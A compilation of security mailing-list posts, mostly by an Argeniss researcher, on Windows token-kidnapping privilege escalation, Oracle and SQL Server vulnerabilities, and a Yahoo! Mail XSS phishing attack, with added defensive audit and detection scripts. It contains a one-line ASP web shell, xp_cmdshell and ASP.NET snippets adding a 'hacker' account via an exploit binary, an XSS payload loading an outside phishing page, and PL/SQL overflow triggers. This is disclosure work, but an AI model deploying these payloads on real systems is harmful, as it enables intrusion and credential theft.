Opening Intranets to attack by using Internet Explorer [paper]

2009-04-10 Thread Cesar

Hi

Just released a new paper; I guess it will be very interesting for list members.

http://nomoreroot.blogspot.com/2009/04/opening-intranets-to-attacks-by-using.html

I will be glad to hear your feedback.

Enjoy.

Cesar.


  


Token Kidnapping Windows 2003 PoC exploit

2008-10-08 Thread Cesar

(From 
http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since the Token Kidnapping presentation 
(http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I 
decided to release a PoC exploit for Win2k3 that allows executing code under 
the SYSTEM account.

Basically, if you can run code under any service in Win2k3 then you can own 
Windows; this is because Windows service accounts can impersonate.
Other processes (not services) that can impersonate are IIS 6 worker processes, so 
if you can run code from an ASP .NET or classic ASP web application then you 
can own Windows too. If you provide shared hosting services then I would 
recommend not allowing users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own 
Windows:

exec xp_cmdshell 'churrasco net user /add hacker'


-Exploiting IIS 6 with ASP .NET:
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments = "net user /add hacker";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.

Cesar.
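An added audit script, not from the post or the Churrasco PoC, that a defender can run to see the two facts the post relies on: which accounts hold the "Impersonate a client after authentication" right, and which running services use a logon account other than LocalSystem. It assumes an elevated PowerShell session on the Windows host being reviewed; the temp file name is the script's own choice.

```powershell
# Added example (not from the original post or the Churrasco PoC): audit the
# two facts the post relies on. Assumes an elevated PowerShell session on the
# Windows host being reviewed; the temp file name is this script's own choice.

$inf = Join-Path $env:TEMP 'secpol-impersonate-audit.inf'

# secedit exports the local policy as an INF file; the [Privilege Rights]
# section lists each user right as comma-separated SIDs prefixed with '*'.
secedit /export /cfg $inf /quiet | Out-Null

$sids = @()
$line = Get-Content $inf | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
if ($line) {
    $sids = ($line -split '=', 2)[1].Trim() -split ',' |
        ForEach-Object { $_.Trim().TrimStart('*') } |
        Where-Object { $_ }
}
Remove-Item $inf -ErrorAction SilentlyContinue

# Resolve each SID to an account name. S-1-5-6 is NT AUTHORITY\SERVICE, a
# group that every service process belongs to regardless of its logon
# account, so if it is listed here any service can impersonate its clients.
Write-Host 'Accounts holding SeImpersonatePrivilege:'
foreach ($sid in $sids) {
    try {
        $account = New-Object System.Security.Principal.SecurityIdentifier($sid)
        $name = $account.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        $name = '(unresolved)'
    }
    Write-Host ('  {0,-14} {1}' -f $sid, $name)
}

# Services running under an account other than LocalSystem: these are the
# "low privileged" services the post talks about. Code that an attacker can
# run inside any of them still carries the right listed above.
Write-Host ''
Write-Host 'Running services not using the LocalSystem account:'
Get-CimInstance Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $_.StartName -ne 'LocalSystem' } |
    Sort-Object StartName, Name |
    Select-Object Name, StartName, PathName |
    Format-Table -AutoSize
```

The second table is the list to review against the post's advice: every entry is a process whose compromise, on the platforms discussed, is one step from SYSTEM, so hosting untrusted code (ASP, xp_cmdshell) inside any of them is the exposure to remove.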


  


Re: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability

2008-07-09 Thread Cesar

Just to clarify, the following SQL Server vulnerabilities:

SQL Server Buffer Overrun Vulnerability - CVE-2008-0106
SQL Server Memory Corruption Vulnerability - CVE-2008-0107
Convert Buffer Overrun - CVE-2008-0086

can be exploited to take complete control of the system on Windows 2003; 
it doesn't matter which user account the SQL Server service is running under.

On Windows 2008 if the service is running under Network Service or Local 
Service account then full system compromise is always possible.

*see http://www.argeniss.com/research/TokenKidnapping.pdf 

Cesar.

--- On Tue, 7/8/08, iDefense Labs [EMAIL PROTECTED] wrote:

 From: iDefense Labs [EMAIL PROTECTED]
 Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability
 To: [EMAIL PROTECTED], [EMAIL PROTECTED], bugtraq@securityfocus.com
 Date: Tuesday, July 8, 2008, 11:18 PM
 iDefense Security Advisory 07.08.08
 http://labs.idefense.com/intelligence/vulnerabilities/
 Jul 08, 2008
 
 I. BACKGROUND
 
 SQL Server is Microsoft's database server product. It supports the restoration and inspection of backups via SQL statements. For more information see the vendor's website found at the following URL.
 
 http://www.microsoft.com/sql/default.mspx



  


Token Kidnapping (Microsoft Security Advisory 951306) presentation available

2008-04-19 Thread Cesar
Presentation is available at:
http://www.argeniss.com/research/TokenKidnapping.pdf

Exploit code won't be released for a while at
Microsoft's request.

Enjoy.

Cesar.


  



[Argeniss] Data0: Next generation malware for stealing databases (Paper)

2007-11-22 Thread Cesar
Hey, I'm releasing this new paper, not a big deal but
interesting.
http://www.argeniss.com/research/Data0.pdf

Abstract: 
This paper is about Data0, a fictitious (or not) simple PoC of new malware that, after it's deployed on a computer in an internal network, will automatically hack database servers and steal their data. Several techniques used by Data0 will be detailed. Data0 will be targeting Microsoft SQL Server and Oracle Database Server, two of the most used database servers. 
While Data0 could be used by the bad guys for evil purposes, it could also be used by security professionals and organizations to determine how strong networks, workstations, database servers, etc. are against this kind of attack. 
This paper is not intended to be a cook book for cyber criminals; it's intended to show people that by implementing simple techniques malware can become “smarter” and cause a lot more damage in the very near future.


Cesar.


  



[Argeniss] Hacking Databases for owning your data (paper)

2007-04-13 Thread Cesar
Abstract:
Data theft is becoming a major threat; criminals have identified where the money is. In the last years many databases from Fortune 500 companies were compromised, causing lots of money losses. This paper will discuss the data theft problem focusing on database attacks. We will show actual information about how serious the data theft problem is, we will explain why you should care about database security, and common attacks will be described. The main part of the paper will be the demonstration of unknown and not well known attacks that can be used or are being used by criminals to easily steal data from your databases. We will focus on the most used database servers, MS SQL Server and Oracle Database; it will be shown how to steal a complete database from the Internet, how to steal data using a database rootkit and backdoor, and some advanced database 0day exploits. We will demonstrate that compromising databases is not a big deal if they haven't been properly secured. Also it will be discussed how to protect against attacks so you can improve database security at your site.

http://www.argeniss.com/research/HackingDatabases.zip
(Tools and exploits included)


Enjoy.

Cesar.


   



[Argeniss] Practical 10 minutes security audit: Oracle Case (Paper)

2007-03-11 Thread Cesar
Hi.

Abstract:
This paper will show an extremely simple technique to quickly audit a software product in order to infer how trustable and secure it is. I will show you step by step how to identify half a dozen local 0day vulnerabilities in a few minutes just by making a couple of clicks on very easy to use free tools; then, for the technical guys' enjoyment, the vulnerabilities will be easily pointed out on disassembled code and detailed; finally a 0day exploit for one of the vulnerabilities will be demonstrated.
While this technique can be applied to any software, in this case I will take a look at the latest version of Oracle Database Server, 10gR2 for Windows, which is an extremely secure product, so it will be a very difficult challenge to find vulnerabilities since Oracle is using advanced next generation tools to identify and fix vulnerabilities.

http://www.argeniss.com/research/10MinSecAudit.zip
(PoC exploit included)

Thanks.

Cesar.



 



The Week of Oracle Database Bugs

2006-11-21 Thread Cesar
The Week of Oracle Database Bugs 
Based on the great idea of H D Moore's Month of Browser
Bugs and LMH's Month of Kernel Bugs, we are proud to
announce that in December we are starting the Week of
Oracle Database Bugs (WoODB). 

What is the WoODB about? 
An Oracle Database 0day will be released every day for
a week in December. 

Why are you doing this? 
We want to show the current state of Oracle software
(in)security; also we want to demonstrate Oracle isn't
getting any better at securing its products (you
already know the history: two years or more to fix a
bug, not fixing bugs, failing to fix bugs, lying about
security efforts, etc, etc, etc.). 

Why are you targeting only Oracle? 
We have 0days for all database software vendors but
Oracle is The #1 Star when talking about lots of
unpatched vulnerabilities and not caring about
security. 

Why not the Month of Oracle Database Bugs?
We could do the Year of Oracle Database Bugs but we
think a week is enough to show how flawed Oracle
software is; also we don't want to give away all our
0days :). Anyway, if you want to contribute send your
Oracle 0days so this can be extended for another week
or more.


See:
http://www.argeniss.com/woodb.html

Cesar.




 



MS06-034 lies? IIS 6 can still be owned?

2006-07-26 Thread Cesar
Hi all.

After getting the details of MS06-034 early, I thought
it would be cool to build the exploits since there had
been a long time without any IIS exploit and our
customers (see *1) would like it, so I asked the guys
to build the exploits and said that I would take care of the
part of elevating privileges, since I had some theory
that there was a way to elevate privileges. 
What was funny is that some time later I realized that
if you can upload an asp page then it's pretty simple
to have a remote shell running under the same account
that the exploits would run under:

-shell.asp (got this from xfocus.org)--
<%=server.createobject("wscript.shell").exec("cmd.exe /c " & request("command")).stdout.readall%>
---
So I wonder why MS patched the vulnerability if it's
pretty simple to have a remote shell on default
configurations?

Maybe because wscript.shell can be disabled, removed,
etc. or you can't run nor upload .exe files on the server;
in these cases the exploit will be handy.

Also MS stated:
-
on Mitigating Factors 

• On IIS 5.0 and IIS 5.1, ASP enabled applications by
default run in the 'Pooled Out of Process'
application, which means they run in DLLHOST.exe,
which is running in the context of the low privilege
IWAM_machinename account.
  
• By default, ASP is not enabled on IIS 6.0. If ASP is
enabled, it runs in the context of a W3WP.exe worker
process running as the low privilege 'NetworkService'
account.

on FAQ Workarounds...
-What might an attacker use the vulnerability to do?
An attacker who successfully exploited this
vulnerability could take complete control of the
affected system.

--
That's pretty confusing since they are saying IIS 5 &
6 run under low privileged accounts and then they
say an attacker could take complete control...???

My theory on the elevation of privileges was in part
wrong, but I could elevate privileges, so now the
exploits can also give you a remote shell under an
administrative account, which I think is why MS
patched the vulnerability.
While MS fixed the ASP vulnerability they didn't fix
a design flaw that allows elevating privileges if you
can run code under IIS 5 & 6 low privileged accounts
:)

So no matter if you applied the fix, if you let users
upload and run binaries from ASP pages on default
settings then your server can still be owned.



Cesar.
(*1 http://www.argeniss.com/products.html)



Re: Re[2]: The Weakness of Windows Impersonation Model

2006-05-31 Thread Cesar

Actually, I would say: a process running as a service
can impersonate almost any other running process's
user account, since you can force processes to connect to
your service using LPC.

Cesar.

--- Brian L. Walche [EMAIL PROTECTED] wrote:

 
 Just one important note regarding Database Security Brief:
 http://www.databasesecurity.com/dbsec/db-sec-tokens.pdf
 Why should I never logon to a Windows database server if I've got admin privileges?
 
 We describe a slightly different problem for MS SQL. MS SQL gets a privileged context on its own from MSDTC. So it doesn't matter if an administrator was logged into the database or not.
 
 MS SQL service's default state after its start is sufficient. A suggested policy to refrain from admin logons will not protect MSSQL.
 
 Additionally, to exploit this you usually do not need a sleeper that waits for a privileged client to logon. Impersonating processes often keep their impersonation tokens for a while. In order to exploit, an attacker just needs to search for token handles. The list of handles can be retrieved through the Windows native API.
 
 
 Brian L. Walche,
 http://www.gentlesecurity.com
 
  Hi Brian,
  I wrote a paper on this subject last year, Snagging Security Tokens to Elevate Privileges (http://www.databasesecurity.com/dbsec-briefs.htm), after Tim Mullen and I thrashed out a few details at Blackhat last year over a few White Russians. The paper discusses the problem in the context of database servers and examines the LogonUser() and AcceptSecurityContext() functions. I believe Longhorn/Vista will address many of the issues that currently affect impersonation.
  Cheers,
  David Litchfield
  http://www.databasesecurity.com/
  http://www.ngssoftware.com/
 
 
  - Original Message -
  From: Brian L. Walche [EMAIL PROTECTED]
  To: bugtraq@securityfocus.com
  Sent: Tuesday, May 16, 2006 7:25 PM
  Subject: The Weakness of Windows Impersonation Model
 
  The Weakness of Windows Impersonation Model
  http://www.gentlesecurity.com/04302006.html
 
  Summary
 
  1. Network Service account’s context is elevated to LocalSystem.
  2. A context of MS SQL service running as a unique user account is elevated up to LocalSystem.
  3. Any service’s context could be elevated to LocalSystem.
 
  There is an immanent risk in running network services as a privileged account, e.g. LocalSystem or Administrator. The threat is widely accepted and recognized. However, most are not aware that nearly the same risk is present for a service configured to run on behalf of a non-privileged account such as Network Service, Local Service or a unique user.
 
  Technical Details
 
  Security implications of impersonation are not new, but are not widely recognized and understood. By definition, impersonation allows a server application to replace (impersonate) its security context (credentials) by the context of the client. In general, impersonation assumes a server reduces its privileges, but it also imposes a threat of unauthorized privilege elevation.
 
  The attack scenario is well known and understood. An attacker terminates, pauses or crashes a privileged server application and starts its own one with the same interface. It receives requests from a privileged client and impersonates. There were a number of attacks reported that have used this approach with named pipes [1, 2, 3]. However, the scope is not limited to named pipes. Any communication channel that supports impersonation can be hijacked for privilege elevation purposes, including LPC, RPC, DDE, COM, etc. Named pipe interfaces are merely less opaque and easier to discover and exploit.
 
  The threat posed by impersonation led to the creation of a separate privilege – “Impersonate a client after authentication”. Therefore, since Windows XP only LocalSystem, Administrators and services have this privilege by default [4] and can impersonate the client’s credentials. Regular users are not able to exploit impersonation anymore, but services (special processes managed by the Service Control Manager) still can. The risk of services run as LocalSystem and Administrators is recognized; however, the threat of other accounts used to run services is underestimated. Network Service, Local Service and even unique user accounts used to run a service still allow privilege elevation for an intruder who successfully attacked a service.
 
  There are two attack scenarios:
  1) If a service does not impersonate highly privileged clients then an attacker who breaks into such a service can simulate the communication interface used by privileged services.
  2) If a service happens to impersonate highly privileged clients then the attacker’s task is easier; he just needs to catch the privileged client context during impersonation.
 
  Windows XP and Windows 2003 use the Network Service account to run critical services such as Remote Procedure Call (RPC), which impersonate privileged

Re: [Full-disclosure] RE: Oracle, where are the patches???

2006-05-04 Thread Cesar

I think everything about Oracle has been said;
everything is on the table to show how really bad
Oracle is at security, but only a few people seem to
get the message. I wonder if at least governments are
paying attention, since national infrastructure
systems are running on Oracle. What else can we do
to have this sad company start taking security
seriously?
So if people at .gov are listening: you should be worried
about national security and start acting on Oracle; I
guess .gov doesn't want their data easily compromised.


Cesar.





[Argeniss] Alert - Yahoo! Mail XSS vulnerability

2006-04-28 Thread Cesar
Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicious scripts being executed on users'
browsers. On 17 April 2006 I received a message that,
when viewed, redirected to a fake Yahoo! Mail login
web page; I could realize this because a strange
domain was displayed in the IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...BRBRa target=_blank   
href=www.blabla23.comstyle=background:url\(java/**/script:document.write('frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0frame frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap

You can see that the attacker used some tricks to
bypass the filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed; after that I haven't heard any
news from them. It seems that the issue was fixed
because now the same message is displayed as:

  ...Message text ...BRBRa target=_blank   
href=www.blabla23.comstyle=background:url\(_java/**/script:document.write('xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0xframe frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap

Now the filters were improved: whenever the word
javascript appears a _ is appended at the beginning,
and an x is appended at the beginning of dangerous
HTML tags.

Again Yahoo! didn't release any advisory nor
contacted customers about this issue. 
This issue was exploited for a long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users' accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.




Re: Recent Oracle exploit is _actually_ an 0day with no patch

2006-04-28 Thread Cesar
David is right, we also have reported hundreds of
vulnerabilities to Oracle and they only fix what you
report to them; they don't care to fix the same
vulnerability in different portions of code. One good
example is that Oracle should have eliminated SQL
injection bugs a long time ago but there are still
SQL injection bugs all around because they only fix
bugs reported by researchers. I remember Mary Ann
Davidson saying Oracle finds more than 75 percent of
significant security vulnerabilities in-house
(http://news.com.com/When+security+researchers+become+the+problem/2010-1071_3-5807074.html),
so WTF, why don't you fix them!

I really can't understand how customers don't demand
better security from Oracle or switch to another vendor. I
would like to have customers like that, so you can sell
very insecure products to them and they won't ever
complain, so I can save billions not improving security
on products and make a lot of money.

PS: Look at this paper dated February 2002, amazing
how Oracle's efforts are visible in 2006! 
http://www.cgisecurity.com/database/oracle/pdf/unbreak3.pdf


Cesar.

--- David Litchfield [EMAIL PROTECTED] wrote:

 
 The recent Oracle exploit posted to Bugtraq (http://www.securityfocus.com/archive/1/431353) is actually an 0day and has no patch.
 
  The referenced exploit seems to use GET_DOMAIN_INDEX_METADATA with a TYPE_NAME that references an attacker-defined package with a (modified?) ODCIIndexGetMeta function.
 
  Your last example uses GET_V2_DOMAIN_INDEX_TABLES, with arguments that reference an attacker-defined package with a (modified?) ODCIIndexUtilGetTableNames function.
 
  Is this a surface-level discrepancy, or is your vector substantively different than the one in the exploit? If these are different, then is it possible that last week's exploit was actually fixed?
 
 No; the same problem occurs. This is the kind of general problem I'm speaking about. Most vendors that actually understand security will look for other bugs in the same functional area if you point out a bug. IMO, my job as a security vulnerability researcher is to highlight problem areas - i.e. areas of functionality that are rife with issues. How can Oracle fix one issue but miss the same flaw two lines later??? In this case though, we're not just talking about one flaw but several. Really, it is inconceivable, yet they, somehow, manage to do it.
 
 God forbid that any of our critical national infrastructure runs on this product... oops, it does :(
 
 And every version from 8 through 9 to 10 release 2 is vulnerable. That's every supported version of Oracle on every operating system.
 
 Oracle customers: honestly - Oracle are not going to listen to the likes of me - but they will listen to folks like you. If you're not happy with the response you're getting from Oracle then get on the 'phone - call them up and tell them that you're not happy. Please, demand improvements.
 
 By the way, this is not an isolated incident. I have many examples to hand where Oracle have tried to fix problems in the same functional area but only whitewashed it. They should be proactively looking for similar issues in the same code just like Microsoft does.
 
 The champion of the quality coding movement (http://www.cio.com/archive/031505/security.html), who applauds ethical hacking, asks Why isn't that standard development process?
 
 I don't know... but I don't think we'll find out in the two year time frame posited; we've got less than a year to go.
 
 
  - Steve
 
  P.S. For those of you who are paying attention at this excruciating level of detail, it seems that David's original use of GET_DOMAIN_INDEX_METADATA in 2004 directly included the code in the NEWBLOCK argument, whereas last week's exploit was performed through an indirect reference to the code in the TYPE_NAME argument.
 
 p.p.s.
 
 Just to clarify the issues:
 
 GET_DOMAIN_INDEX_TABLES
 GET_DOMAIN_INDEX_METADATA
 GET_V2_DOMAIN_INDEX_TABLES
 
 are all vulnerable to the exploit.
 
 Cheers,
 David Litchfield
 NGSSoftware Ltd,
 http://www.ngssoftware.com/
 +44 (0) 208 401 0070
 
 




[Argeniss] Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure

2006-04-20 Thread Cesar
Argeniss Security Advisory


Name:  Oracle Database 10gR1 Buffer overflow in
VERIFY_LOG procedure (DB03)
Affected Software:  Oracle Database Server version
10gR1
Severity:  High
Remote exploitable:  Yes (Authentication to Database
Server is needed)
Credits:  Esteban Martínez Fayó
Date:  4/18/2006
Advisory Number:  ARG040603


Details: 
Oracle Database Server provides the DBMS_SNAPSHOT_UTL
package that includes capability to manage
materialized views.
This package contains the public procedure VERIFY_LOG
that is vulnerable to buffer overflow.

By default DBMS_SNAPSHOT_UTL has EXECUTE permission granted to
PUBLIC, so any Oracle database user can exploit this
vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause a DoS (Denial of Service), killing the Oracle server
process. 


Vendor Status:
Vendor was contacted and a Critical Patch Update was
released.


Workaround:
Restrict access to the DBMS_SNAPSHOT_UTL package (See
Links section).


Patch Available:
Although this security bug is addressed in the
Critical Patch Update April 2006, for most of the
affected platforms there are no patches available at
this moment.
Oracle informed that the missing patches would be
available on 01-May-06.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-040603.txt
http://www.argeniss.com/research/Workaround-ADV-040603.sql
http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html


Spam:
Searching for Oracle 0days? 
Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html


Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com





[Argeniss] Alert - Yahoo! Webmail XSS

2006-04-17 Thread Cesar
Hi.

I just got a targeted phishing attack to one of my
Yahoo email accounts; what's interesting is that
the attack exploits a Yahoo! webmail 0day XSS
vulnerability. 
I'm trying to contact Yahoo right now but in the
meantime I thought it would be good to provide some
bits because of the seriousness of this. 
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ; it's interesting that the
address bar in IE doesn't refresh to show the actual
URL, you can only see the redirection to
http://w00tynetwork.com/x/ in the IE status bar if you
have it visible.
I don't know if this vulnerability is being exploited
in the wild since it was a targeted attack; I'm sure
about this because of the content of the message.

Here is an extract from the exploit so you can start
building some signatures, filtering, etc.
---
(java/**/script:document.write('frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0frame
frameborder=0
src=http://w00tynetwork.com/x//frameset'))
---

I will provide full details later when Yahoo! fixes the
issue.
If security vendors are interested in full details
please ask for them at infoatargeniss.com

Cesar.
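A constructed detection helper, added here and not part of the original alert (this one or the later Yahoo! Mail XSS post that quotes the same payload): it normalises the comment-split scheme name (java/**/script:) before matching, so a filter that only looks for the literal string "javascript:" is not bypassed. The function name and the sample markup are constructed for this example; the first sample mirrors the structure of the reported extract with tags restored by hand.

```powershell
# Added example (not from the original alert): a filter for the comment-split
# "java/**/script:" trick used in the reported message. The function name and
# the sample markup below are constructed for this example.

function Test-ObfuscatedScriptUrl {
    param([Parameter(Mandatory)][string]$Html)

    # The comment splits the word so a filter looking for the literal
    # "javascript:" never sees it, while the browser still evaluated the URL.
    # Strip /* */ comments and control/layout characters before matching so
    # the detector sees the same scheme name the browser ends up with.
    $opts = [System.Text.RegularExpressions.RegexOptions]::Singleline
    $normalised = [regex]::Replace($Html, '/\*.*?\*/', '', $opts)
    $normalised = [regex]::Replace($normalised, '[\s\x00-\x1F]+', '')

    # Flag the scheme wherever it ends up inside a tag attribute or CSS url().
    return [regex]::IsMatch($normalised, '(?i)(?:href|src|style|url\()[^>]*?javascript:')
}

# Constructed samples: the first mirrors the structure of the reported payload
# (tags restored by hand), the second uses whitespace instead of a comment,
# the third is a harmless link with a normal background image.
$samples = @(
    '<a target=_blank href="www.blabla23.com" style="background:url(java/**/script:document.write(''...''))">x</a>',
    '<img src="JAVA  SCRIPT:alert(1)">',
    '<a href="http://example.invalid/page" style="background:url(/img/bg.png)">ok</a>'
)
foreach ($s in $samples) {
    # Prints True for the first two samples and False for the third.
    '{0,-5} {1}' -f (Test-ObfuscatedScriptUrl -Html $s), $s
}
```

The same normalise-then-match step applies to any mail or proxy filter: decode entities and drop comments before the signature runs, not after.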




WLSI - Windows Local Shellcode Injection - Paper

2006-03-15 Thread Cesar
Hi.

For those who didn't attend Black Hat Europe or
EuSecWest, here is the paper on which the presentation
was based.


WLSI - Windows Local Shellcode Injection

Abstract:
This paper describes a new technique to create 100% reliable local exploits for Windows operating systems. The technique uses some Windows operating system design weaknesses that allow low privileged processes to insert data into almost any Windows process, no matter if it is running under high privileges. We all know that local exploitation is much easier than remote exploitation, but it has some difficulties. After a brief introduction and a description of the technique, a couple of samples (exploits for MS05-012 and MS05-040) will be provided so the reader will be able to write his/her own exploits.

http://www.argeniss.com/research/WLSI.zip

Enjoy.

Cesar.



[Argeniss] Oracle Database Buffer overflows vulnerabilities in public procedures of XDB.DBMS_XMLSCHEMA{_INT}

2006-01-27 Thread Cesar
Argeniss Security Advisory


Name:  Oracle Database Buffer overflows
vulnerabilities in public procedures of
XDB.DBMS_XMLSCHEMA{_INT}
Affected Software:  Oracle Database Server versions
9iR2 and 10gR1
Severity:  High
Remote exploitable:  Yes (Authentication to Database
Server is needed)
Credits:  Esteban Martínez Fayó
Date:  1/26/2006
Advisory Number:  ARG010601


Details: 
Oracle Database Server provides the DBMS_XMLSCHEMA and
DBMS_XMLSCHEMA_INT Packages that include procedures to
register and delete XML schemas.
These packages contain the public procedures
GENERATESCHEMA and GENERATESCHEMAS that are vulnerable
to buffer overflow attacks.

By default XDB.DBMS_XMLSCHEMA{_INT} has EXECUTE
permission granted to PUBLIC, so any Oracle database user can
exploit this vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause a DoS (Denial of Service), killing the Oracle server
process. 


To reproduce the vulnerabilities execute the following
PL/SQL:


SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMA('LongStringHere',
'OrLongStringHere') from dual;



SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMAS('LongStringHere',
'OrLongStringHere') from dual;



DECLARE
  a SYS.XMLTYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA
('LongStringHere', 'OrLongStringHere', '', FALSE,
FALSE, FALSE);
END;



DECLARE
 a SYS.XMLSEQUENCETYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMAS
('LongStringHere', 'OrLongStringHere', '', '', FALSE,
FALSE);
END;



PoC Exploits:
http://www.argeniss.com/research/OraGENERATESCHEMAExploits.txt


Vendor Status:
Vendor was contacted and a patch was released.


Workaround:
Restrict access to the XDB.DBMS_XMLSCHEMA and
XDB.DBMS_XMLSCHEMA_INT packages.


Patch Available:
Apply Oracle Critical Patch Update January 2006
available at Oracle Metalink.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html



Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com



Re: FW: Windows Update - Unsafe ActiveX control (fwd)

2003-07-18 Thread Cesar
Hi.

I wouldn't consider the Windows Update ActiveX as safe;
the ActiveX has dangerous methods, for example it can
reboot the computer. Of course the ActiveX checks for
the current site and if it's not the Windows Update site
it won't work, but if there is some XSS hole in the
Windows Update site or if there is a bug in IE that
allows tricking the URL, then the ActiveX becomes very
dangerous. In my opinion restricting an ActiveX to a
specific site only reduces the attack surface but it
doesn't make an ActiveX safe.

Cesar.
--- Dave Ahmad [EMAIL PROTECTED] wrote:
 
 -- Forwarded message --
 Date: Thu, 17 Jul 2003 XX:XX:XX
 To: Dave Ahmad [EMAIL PROTECTED]
 Subject: FW: Windows Update - Unsafe ActiveX control
 
 Hi,
 
 I would prefer not to reply to this post directly, but if possible can you please mention the following (anonymously):
 
 --
 Safe for Scripting simply means that the control is safe to be used from untrusted callers. SFS controls can access files and other resources if it is in a controlled way (eg, with the consent of the user). Windows Update is safe because it only allows itself to be hosted from the Windows Update site. If you try and host the control from another domain, the control will not work. Since the Windows Update site only ever uses the control for good purposes, and requires the user's consent to install patches, etc. it is considered Safe for Scripting. _All_ ActiveX controls can access memory and registers directly, whether they are marked as safe or not, since they typically are implemented in native code ;-)
 
 Windows Update does not require you to run unsafe controls; unfortunately the generic error that appears when you disable scripting of _safe_ controls makes it sound like there are _unsafe_ controls. If you enable scripting of safe controls then the site should work fine. If you are concerned about securing the browser, I recommend that you place Windows Update in the Trusted Sites zone and run that in the Medium security mode, and run the rest of the Internet Zone in High mode, although this will break a lot of sites.
 




RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0

2001-07-25 Thread Vega, Cesar

Same thing in AIX 4.2.1.0 and HP-UX 10.20/11.00, previously configured as
Trusted System.

Cordial Greetings,

CVC

#  -Original Message-
#  From: Stephanie Thomas [mailto:[EMAIL PROTECTED]]
#  Sent: Wednesday, July 25, 2001 11:18 AM
#  To: Emre Yildirim; [EMAIL PROTECTED]
#  Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0
#  
#  
#  Hi Emre,
#  
#  We have tested OpenBSD and NetBSD, and have found
#  that they do not experience this vulnerability, 
#  even with ssh 3.0.0 installed.
#  
#  This is most likely due to the method used to encrypt the 
#  password in /etc/passwd or /etc/shadow.
#  
#  Best Regards,
#  
#  Steph
#  
#  -Original Message-
#  From: Emre Yildirim [mailto:[EMAIL PROTECTED]]
#  Sent: Monday, July 23, 2001 5:12 PM
#  To: [EMAIL PROTECTED]
#  Cc: [EMAIL PROTECTED]
#  Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0
#  
#  
#  
#   SSH Secure Shell 3.0.0 does not ship with any
#   of the operating systems mentioned, nor does the
#   announcement specify that it does. However, if a
#   user has explicitly installed SSH Secure Shell 3.0.0
#   on any of the listed operating systems, they are
#   vulnerable to this potential exploit.
#  
#  
#  I don't want to drag this boring thread any longer, but in
#  your advisory, it stated that OpenBSD and NetBSD were
#  not vulnerable.  So...if I install SSH 3.0.0 on one of those
#  (even though they already come with openssh), ssh will not
#  be vulnerable to this bug?  Or will it?  I think that part
#  created a little confusion.
#  
#  
#  Cheers
#  
#  
#  



Palm Pilot - How to view hidden files

2001-02-12 Thread Paulo Cesar Breim

The software Tiny Sheet, present in all versions of Palm Pilot, has a
function called IMPORT file.
Well, when this function is used ALL FILES, including the hidden files
protected with a password, can be imported into a Sheet.